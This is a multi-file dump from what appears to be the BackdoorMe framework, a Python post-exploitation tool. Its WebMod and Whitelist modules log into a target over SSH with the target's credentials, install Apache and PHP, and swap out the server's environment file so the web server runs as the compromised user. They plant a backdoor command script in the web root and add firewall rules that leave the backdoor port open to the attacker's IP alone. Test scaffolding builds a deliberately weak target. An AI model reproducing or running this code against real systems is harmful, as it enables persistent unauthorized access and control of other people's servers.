APACHE_LOG_DIR=/var/log/apache2$SUFFIX 24 | 25 | ## The locale used by some modules like mod_dav 26 | export LANG=C 27 | ## Uncomment the following line to use the system default locale instead: 28 | #. /etc/default/locale 29 | 30 | export LANG 31 | 32 | ## The command to get the status for 'apache2ctl status'. 33 | ## Some packages providing 'www-browser' need '--dump' instead of '-dump'. 34 | #export APACHE_LYNX='www-browser -dump' 35 | 36 | ## If you need a higher file descriptor limit, uncomment and adjust the 37 | ## following line (default is 8192): 38 | #APACHE_ULIMIT_MAX_FILES='ulimit -n 65536' 39 | 40 | ## If you would like to pass arguments to the web server, add them below 41 | ## to the APACHE_ARGUMENTS environment. 42 | #export APACHE_ARGUMENTS='' 43 | 44 | ## Enable the debug mode for maintainer scripts. 45 | ## This will produce a verbose output on package installations of web server modules and web application 46 | ## installations which interact with Apache 47 | #export APACHE2_MAINTSCRIPT_DEBUG=1 48 | 49 | -------------------------------------------------------------------------------- /modules/web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /modules/webMod.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | import time 3 | 4 | class WebMod(Module): 5 | 6 | def __init__(self, target, backdoor, core): 7 | self.core = core 8 | self.target = target 9 | self.name = "Web" 10 | self.backdoor = backdoor 11 | self.options = { 12 | "location" : Option("location", "newback.php", "location of file", False) 13 | } 14 | 15 | 16 | def exploit(self): 17 | location = self.get_value("location") 18 | 19 | self.target.scpFiles(self, "backdoors/auxiliary/web/install.sh", False) 20 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S bash install.sh") 21 | 22 | print("Starting Apache server.") 23 | print("This will take 10 seconds. If it takes longer, the script will proceed, but this will not work. In that case, run the exploit again once you know the server is up (it will call back to you as www-data)") 24 | time.sleep(10) 25 | toW = 'modules/web/envvars' 26 | stringToAdd="" 27 | fileToWrite=open(toW, 'w') 28 | 29 | with open ("modules/web/env1", "r") as myfile: 30 | data = myfile.read() 31 | data = data[:-1] 32 | stringToAdd += data+self.target.uname 33 | with open ("modules/web/env2", "r") as myfile: 34 | data = myfile.read() 35 | stringToAdd+=data 36 | 37 | fileToWrite.write(stringToAdd) 38 | fileToWrite.close() 39 | 40 | self.target.scpFiles(self, 'modules/web/envvars') 41 | print("Moving Apache environment variables") 42 | 43 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S rm /etc/apache2/envvars") 44 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S mv envvars /etc/apache2") 45 | 46 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S service apache2 restart") 47 | 48 | 49 | 50 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S echo \' \' > " + location) 51 | 52 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S mv " + location + " /var/www/html") 53 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S echo \"" + self.backdoor.get_command() + "\" > ajdoiwekd.sh") 54 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S cp ajdoiwekd.sh /var/www/html") 55 | 56 | print(GOOD + self.name + " module success") 57 | -------------------------------------------------------------------------------- /modules/whitelist.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | 3 | 4 | class Whitelist(Module): 5 | def __init__(self, target, backdoor, core): 6 | self.core = core 7 | self.target = target 8 | self.name = "Whitelist" 9 | self.backdoor = backdoor 10 | self.options = { 11 | "ip": Option("ip", self.core.localIP, "IP to whitelist", True) 12 | } 13 | 14 | def exploit(self): 15 | port = self.backdoor.get_value("port") 16 | self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S iptables -I INPUT -p tcp -m tcp -s " + str(self.get_value("ip")) + " --dbackdoor " + str(port) + " -j ACCEPT") 17 | self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S iptables -I INPUT -p tcp -m tcp -s 0.0.0.0/0 --dbackdoor " + str(port) + " -j DROP") 18 | self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S iptables-save") 19 | print(GOOD + self.name + " module success") 20 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | cffi==1.9.1 2 | colorama==0.3.7 3 | cryptography==1.6 4 | ecdsa==0.13 5 | future==0.16.0 6 | idna==2.1 7 | nose==1.3.7 8 | paramiko==2.0.2 9 | pefile==2016.3.28 10 | plumbum==1.6.2 11 | pyasn1==0.1.9 12 | pycparser==2.17 13 | rpyc==3.3.0 14 | scp==0.10.2 15 | six==1.10.0 16 | pexpect 17 | netifaces 18 | nose-exclude 19 | -------------------------------------------------------------------------------- /target.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import os 3 | import socket 4 | import subprocess 5 | from colorama import * 6 | from paramiko import SSHClient 7 | from scp import SCPClient 8 | 9 | GOOD = Fore.GREEN + " + " + Fore.RESET 10 | BAD = Fore.RED + " - " + Fore.RESET 11 | WARN = Fore.YELLOW + " * " + Fore.RESET 12 | INFO = Fore.BLUE + " + " + Fore.RESET 13 | 14 | 15 | class Target: 16 | def __init__(self, hostname, uname, pword, num, port=22): 17 | self.hostname = hostname 18 | self.uname = uname 19 | self.pword = pword 20 | self.target_num = num 21 | self.port = port 22 | self.ssh = None 23 | self.is_open = False 24 | self.scp = None 25 | self.sessions = [] 26 | def conn(self): 27 | #print("Opening SSH connection to target...") 28 | self.ssh = paramiko.SSHClient() # use ssh.exec_command("") to perform an action. 29 | self.ssh.load_system_host_keys() 30 | self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 31 | self.ssh.connect(self.hostname, port=self.port, username=self.uname, password=self.pword) 32 | self.scp = SCPClient(self.ssh.get_transport())#don't call this, but use the above function instead. 33 | self.is_open = True 34 | 35 | def scpFiles(self, filename, a, recur=True): # call this with a filename and false if it is a single file 36 | print(GOOD + "Shipping files: ") 37 | print(INFO + a) 38 | bareFile = "" 39 | for i in range(len(a)-1, 0, -1): 40 | if(a[i] == '/'): 41 | break 42 | else: 43 | bareFile += a[i] 44 | bareFile = bareFile[::-1] 45 | #print bareFile 46 | #print("echo " + self.pword + " | sudo -S rm " + bareFile) 47 | self.ssh.exec_command("echo " + self.pword + " | sudo -S rm " + bareFile) 48 | self.scp.put(a, recursive=recur) 49 | 50 | def close(self): 51 | self.is_open = False 52 | self.ssh.close() 53 | 54 | 55 | -------------------------------------------------------------------------------- /tests/incomplete/containers.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pexpect 3 | import subprocess 4 | import docker 5 | import sys 6 | import random 7 | 8 | from colorama import * 9 | 10 | GOOD = Fore.GREEN + " + " + Fore.RESET 11 | BAD = Fore.RED + " - " + Fore.RESET 12 | WARN = Fore.YELLOW + " * " + Fore.RESET 13 | INFO = Fore.BLUE + " + " + Fore.RESET 14 | 15 | 16 | class Machine(object): 17 | def __init__(self, image="phusion/baseimage:latest", verbose=True): 18 | self.image = image 19 | self.client = docker.from_env() 20 | self.base = self.client.images.pull(self.image) 21 | self.container = self.client.containers.run(self.base, "/sbin/my_init", detach=True) 22 | self.verbose = verbose 23 | self.docker_id = str(self.container.id[:12]) 24 | 25 | def stop(self): 26 | return self.container.stop() 27 | 28 | def get_status(self): 29 | return self.container.status 30 | 31 | def run(self, command): 32 | if self.verbose: 33 | print("# " + command) 34 | res = self.container.exec_run(command) 35 | if self.verbose: 36 | print(res) 37 | return res 38 | 39 | def get_ip(self): 40 | return self.run("ifconfig eth0 | grep \"inet \" | awk -F'[: ]+' '{ print $4 }'") 41 | 42 | def create_archive(): 43 | os.system("tar -czf code.tar.gz ./* 2> /dev/null") 44 | 45 | def setup_attacker(m): 46 | codebase = open("code.tar.gz", "rb").read() 47 | m.container.put_archive("/", codebase) 48 | m.run("apt-get update") 49 | m.run("apt-get install -y netcat nmap git ssh libssl-dev python-tk python-dev python-pip build-essential libxml2-dev libxslt1-dev zlib1g-dev") 50 | return True 51 | 52 | def setup_target(m): 53 | m.run("apt-get update") 54 | m.run("useradd -ms /bin/bash george") 55 | m.run("echo 'george:password' | chpasswd") 56 | m.run("apt-get install -y openssh-server ssh net-tools netcat python") 57 | m.run("service ssh start") 58 | return True 59 | 60 | ''' 61 | machines = {} 62 | client = docker.from_env() 63 | create_archive() 64 | 65 | try: 66 | print(GOOD + "Creating attacker...") 67 | machines["Attacker"] = Machine() 68 | print(GOOD + "Setting up attacker...") 69 | setup_attacker(machines["Attacker"]) 70 | 71 | print(GOOD + "Creating target...") 72 | machines["Target"] = Machine() 73 | print(GOOD + "Setting up target...") 74 | setup_target(machines["Target"]) 75 | machines["Attacker"].run("python dependencies.py") 76 | input("") 77 | 78 | finally: 79 | print(GOOD + "Cleaning up...") 80 | for m in machines: 81 | machines[m].stop() 82 | ''' 83 | -------------------------------------------------------------------------------- /tests/tests.py: -------------------------------------------------------------------------------- 1 | from master import * 2 | from nose.tools import nottest 3 | 4 | ####################################################################################### 5 | 6 | @nottest 7 | def walk(folder): 8 | data = [] 9 | for root, dirs, files in os.walk(folder): 10 | del dirs[:] # walk down only one level 11 | path = root.split('/') 12 | for file in files: 13 | if file[-3:] == ".py": 14 | data.append(folder.replace("backdoors/", "") + "/" + str(file).replace(".py", "")) 15 | return data 16 | 17 | @nottest 18 | def get_backdoors_list(): 19 | bds = [] 20 | bds += walk("backdoors/access") 21 | bds += walk("backdoors/escalation") 22 | bds += walk("backdoors/windows") 23 | bds += walk("backdoors/shell") 24 | bds += walk("backdoors/auxiliary") 25 | return bds 26 | 27 | @nottest 28 | def get_backdoors(): 29 | objs = [] 30 | args = get_backdoors_list() 31 | for s in args: 32 | bd = s.split()[0] 33 | loc, bd = bd.rsplit("/", 1) 34 | if "backdoors/" + loc not in sys.path: 35 | sys.path.insert(0, "backdoors/" + loc) 36 | mod = importlib.import_module(bd) 37 | clsmembers = inspect.getmembers(sys.modules[bd], inspect.isclass) 38 | objs.append([m for m in clsmembers if m[1].__module__ == bd][0][1]) 39 | objs = [o for o in objs if o.__name__ != "Option"] 40 | return objs 41 | 42 | @nottest 43 | def get_modules(): 44 | bd = BackdoorMe() 45 | return bd.enabled_modules.keys() 46 | 47 | @nottest 48 | def check_add_module_test(bd, m): 49 | core = BackdoorMe() 50 | bd = bd(core) 51 | if bd.allow_modules: 52 | bd.do_add(m) 53 | bd.do_show("options") 54 | pass 55 | 56 | @nottest 57 | def check_crash_test(bd): 58 | core = BackdoorMe() 59 | bd(core).do_show("options") 60 | pass 61 | 62 | @nottest 63 | def check_help_text(bd): 64 | core = BackdoorMe() 65 | if bd(core).help_text == "": 66 | assert False 67 | 68 | ####################################################################################### 69 | 70 | def backdoor_crash_test(): 71 | bds = get_backdoors() 72 | for bd in bds: 73 | yield check_crash_test, bd 74 | 75 | def add_module_test(): 76 | bds = get_backdoors() 77 | for bd in bds: 78 | for m in get_modules(): 79 | yield check_add_module_test, bd, m 80 | 81 | def help_text_test(): 82 | bds = get_backdoors() 83 | for bd in bds: 84 | yield check_help_text, bd 85 | 86 | def add_target_test(): 87 | bd = BackdoorMe() 88 | bd.addtarget("10.1.0.2", "student", "target123") 89 | pass 90 | --------------------------------------------------------------------------------